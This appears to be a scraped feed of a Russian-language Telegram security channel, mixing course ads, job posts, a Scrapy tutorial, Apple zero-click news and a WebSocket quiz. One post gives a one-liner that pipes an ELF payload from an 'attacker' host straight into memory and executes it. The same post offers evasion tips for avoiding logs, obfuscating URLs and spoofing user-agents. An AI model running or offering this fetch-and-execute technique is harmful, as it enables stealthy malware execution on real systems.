Вы тестируете веб-приложение, которое передаёт данные чата через WebSocket. При анализе трафика вы замечаете:
— Подключение идёт по ws:// вместо wss://
— Сообщения передаются в открытом виде (JSON без шифрования)
— В сообщениях содержатся идентификаторы пользователей и текст переписки
Какая уязвимость возникает в такой конфигурации
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔4
This media is not supported in your browser
VIEW IN TELEGRAM
👾3
7 октября стартует второй поток курса «AI-агенты для DS-специалистов».
За 5 недель вы научитесь собирать агентов, которые уже сейчас будут помогать бизнесу.
В кружке выше Максим Шаланкин, наш преподаватель, рассказывает подробнее — включай, чтобы не пропустить.
Please open Telegram to view this post
VIEW IN TELEGRAM
Специалист по информационной безопасности — 230 000 ₽, офис (Москва)
Инженер ИБ сервисов — удаленно/гибрид (Москва)
Pentester — от 380 000 ₽, удаленно (Москва)
Information Security Specialist (DLP) — от 120 000 ₽, офис (Москва)
Специалист ИБ — от 200 000 до 300 000 ₽, офис (Моска)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4🔥2
Если нельзя писать на диск или не хочется светиться в логах — можно выполнить ELF-бинарник напрямую из памяти, минуя файловую систему:
curl https://attacker/payload.elf | bash -c 'chmod +x /dev/fd/0 && /dev/fd/0'
Как работает:
— curl тянет бинарь по HTTP
— /dev/fd/0 — спецфайл, указывающий на поток stdin
— chmod +x делает поток исполняемым
— /dev/fd/0 сразу запускается как исполняемый ELF
Полезно для:
— Заменить curl на wget -qO-, socat, nc, httpie
— Альтернатива: /proc/self/fd/0
— Можно обфусцировать URL, использовать TLS и подмену юзер-агента
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍2
This media is not supported in your browser
VIEW IN TELEGRAM
❗ Так, владелец макбука. Хватит позировать в кофейне.
Настоящее портфолио — это не стикеры на крышке, а проект с чистым кодом, README и рабочей демкой.
Не знаешь, как такой собрать? Научим. Наш курс «ML для старта в Data Science» — это пошаговый гайд к проекту, за который не стыдно.
ОСТАЛАСЬ НЕДЕЛЯ, чтобы забрать его по старой цене в 44.000 ₽. С 1 сентября — всё.
🎁 И да, при покупке курса ML до 1 сентября — курс по Python получаешь бесплатно.
👉 Апгрейд от «вайба» до «оффера» тут
Настоящее портфолио — это не стикеры на крышке, а проект с чистым кодом, README и рабочей демкой.
Не знаешь, как такой собрать? Научим. Наш курс «ML для старта в Data Science» — это пошаговый гайд к проекту, за который не стыдно.
ОСТАЛАСЬ НЕДЕЛЯ, чтобы забрать его по старой цене в 44.000 ₽. С 1 сентября — всё.
🎁 И да, при покупке курса ML до 1 сентября — курс по Python получаешь бесплатно.
👉 Апгрейд от «вайба» до «оффера» тут
🥱1
Группировка маскирует свои серверы под IT-сервисы, комбинирует собственные и покупные инструменты, а внутри неё назревает раскол — разные фракции строят отдельную инфраструктуру.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1👾1
🔧 Автоматизация сбора данных с веб-сайтов через Scrapy
Scrapy — Python-фреймворк для веб-скрейпинга. Идеально подходит для:
➖ Сбора данных
➖ Поиска уязвимостей и метаданных
➖ OSINT и аналитики
Как работает:
1. Для начала нужно установить Scrapy. Это можно сделать через pip:
2. Создайте новый проект с помощью команды:
3. Создайте новый файл паука в каталоге spiders/ вашего проекта:
4. Пример паука:
5. После настройки паука вы можете запустить его с помощью команды:
Советы по использованию:
— Настройте
— Используйте обработку ошибок
— Применяйте разные User-Agent / Proxy
🐸 Библиотека хакера
#буст
Scrapy — Python-фреймворк для веб-скрейпинга. Идеально подходит для:
Как работает:
1. Для начала нужно установить Scrapy. Это можно сделать через pip:
pip install scrapy
2. Создайте новый проект с помощью команды:
scrapy startproject myproject
3. Создайте новый файл паука в каталоге spiders/ вашего проекта:
scrapy genspider example_spider example.com
4. Пример паука:
import scrapy
class ExampleSpider(scrapy.Spider):
name = "example_spider"
start_urls = ['https://www.example.com']
def parse(self, response):
yield {
'title': response.xpath('//title/text()').get(),
'url': response.url,
}
5. После настройки паука вы можете запустить его с помощью команды:
scrapy crawl example_spider -o output.json
Советы по использованию:
— Настройте
DOWNLOAD_DELAY
— Используйте обработку ошибок
— Применяйте разные User-Agent / Proxy
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👏1👾1
Мы сделаем вам предложение, от которого невозможно отказаться 🤌
Вы покупаете себе курс «Математика для Data Science» от преподавателей ВМК МГУ, а мы дарим второй такой же курс вашему другу.
Предложение действует только до 1 сентября. Ничего личного, просто математика.
👉 Принять предложение
Вы покупаете себе курс «Математика для Data Science» от преподавателей ВМК МГУ, а мы дарим второй такой же курс вашему другу.
Предложение действует только до 1 сентября. Ничего личного, просто математика.
👉 Принять предложение
👍1
🚨 0-click атака на Apple
Уязвимость в RawCamera.bundle (JPEG Lossless) позволяет выполнить код без кликов — достаточно получить фото в iMessage.
⚠️ Затронуты:
Apple уже выпустила патчи. Исследователи сделали тулзу ELEGANT BOUNCER на Rust для проверки DNG.
Что делать:
— Обновить систему.
— Выключить автопоказ превью.
— Проверять файлы из незнакомых источников.
🔗 Читать подробнее
🐸 Библиотека хакера
#свежак
Уязвимость в RawCamera.bundle (JPEG Lossless) позволяет выполнить код без кликов — достаточно получить фото в iMessage.
iOS/iPadOS 18.6.2, macOS Sequoia 15.6.1, Sonoma 14.7.8, Ventura 13.7.8, iPadOS 17.7.10.
Apple уже выпустила патчи. Исследователи сделали тулзу ELEGANT BOUNCER на Rust для проверки DNG.
Что делать:
— Обновить систему.
— Выключить автопоказ превью.
— Проверять файлы из незнакомых источников.
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔4👍1🔥1
📢 Какой сетап идеально подойдёт для разработки AI-агента?
Голосуйте за свой вариант и пишите в комментариях, в каком режиме вы реально кодите.
❤️ — 1
👍 — 2
⚡️ — 3
👏 — 4
🔥 — 5
🎉 — 6
😁 — 7
😍 — 8
🤩 — 9
Какой бы сетап ни был, без AI-агентов в 2025 всё равно далеко не уедешь.
👉 Научим, как строить агентов, которые кодят с тобой
Голосуйте за свой вариант и пишите в комментариях, в каком режиме вы реально кодите.
❤️ — 1
👍 — 2
⚡️ — 3
👏 — 4
🔥 — 5
🎉 — 6
😁 — 7
😍 — 8
🤩 — 9
Какой бы сетап ни был, без AI-агентов в 2025 всё равно далеко не уедешь.
👉 Научим, как строить агентов, которые кодят с тобой
🎉2🤩2❤1